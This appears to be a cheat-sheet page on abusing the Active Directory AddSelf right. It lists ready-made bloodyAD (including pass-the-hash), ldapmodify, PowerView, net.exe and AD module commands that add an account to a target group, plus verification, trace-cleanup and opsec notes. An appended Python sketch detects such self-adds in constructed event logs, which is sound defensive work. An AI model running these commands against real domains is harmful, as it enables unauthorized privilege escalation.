AddSelf
Source can add itself to the target group (Self-Membership extended right)
Applies to: User → Group
Linux Abuse
bloodyAD — add self to group
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    add groupMember '<target-group>' '<username>'
bloodyAD — add self with hash
bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
    add groupMember '<target-group>' '<username>'
ldapmodify (self-membership)
ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: member
member: CN=<username>,CN=Users,DC=<domain>,DC=<tld>
EOF
Windows Abuse
PowerView
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
CMD / net.exe
net group "<target-group>" <username> /add /domain
AD Module
Add-ADGroupMember -Identity '<target-group>' -Members '<username>'
Verify
Get-DomainGroupMember -Identity '<target-group>' | Where-Object {$_.MemberName -eq '<username>'}
Cleanup (remove self after done)
Remove-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Opsec
- A self-membership write generates event 4728 on the DC
- Functionally identical to AddMember, except that the source can only add itself: less powerful than AddMember, but with the same detection footprint
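
Detection side of the Opsec notes, as an added example (not part of the original page): because AddSelf only lets the source add itself, the resulting event carries the same SID as both the acting account and the new member. The sketch below filters exported event XML for that pattern. The sample events, SIDs, account and group names are constructed; 4728 is the ID named above, and the block also accepts 4732 and 4756 (the member-added events for domain-local and universal security groups), which goes beyond the page.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# 4728 is the ID named on the page (global groups); 4732 and 4756 are the
# matching "member added" events for domain-local and universal groups.
MEMBER_ADDED = {"4728", "4732", "4756"}
DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID


def make_event(event_id, subj_rid, subj_name, member_rid, member_name, group):
    """Build a constructed Security-log record in Windows event XML form."""
    data = {
        "MemberName": f"CN={member_name},CN=Users,DC=corp,DC=example",
        "MemberSid": f"{DOM}-{member_rid}",
        "TargetUserName": group,
        "SubjectUserSid": f"{DOM}-{subj_rid}",
        "SubjectUserName": subj_name,
    }
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f"</System><EventData>{fields}</EventData></Event>")


SAMPLE_EVENTS = [  # constructed, not taken from a real domain controller
    make_event(4728, 500, "Administrator", 1107, "bob", "Helpdesk"),
    make_event(4728, 1105, "alice", 1105, "alice", "Server Admins"),
    make_event(4729, 1105, "alice", 1105, "alice", "Server Admins"),
    make_event(4756, 1110, "carol", 1110, "carol", "Tier1 Operators"),
]


def find_self_adds(xml_events):
    """Return (event_id, account, group) where the actor added itself."""
    hits = []
    for raw in xml_events:
        root = ET.fromstring(raw)
        event_id = root.findtext("e:System/e:EventID", namespaces=NS)
        if event_id not in MEMBER_ADDED:
            continue  # e.g. 4729 (member removed) is out of scope here
        data = {d.get("Name"): d.text or ""
                for d in root.findall("e:EventData/e:Data", NS)}
        subject, member = data.get("SubjectUserSid"), data.get("MemberSid")
        # AddSelf leaves the same SID as both the actor and the new member.
        if subject and subject.upper() == (member or "").upper():
            hits.append((event_id, data["SubjectUserName"],
                         data["TargetUserName"]))
    return hits


if __name__ == "__main__":
    for hit in find_self_adds(SAMPLE_EVENTS):
        print("self-add:", hit)
```

An administrator who legitimately adds their own account produces the same match, so triage hits by how sensitive the target group is.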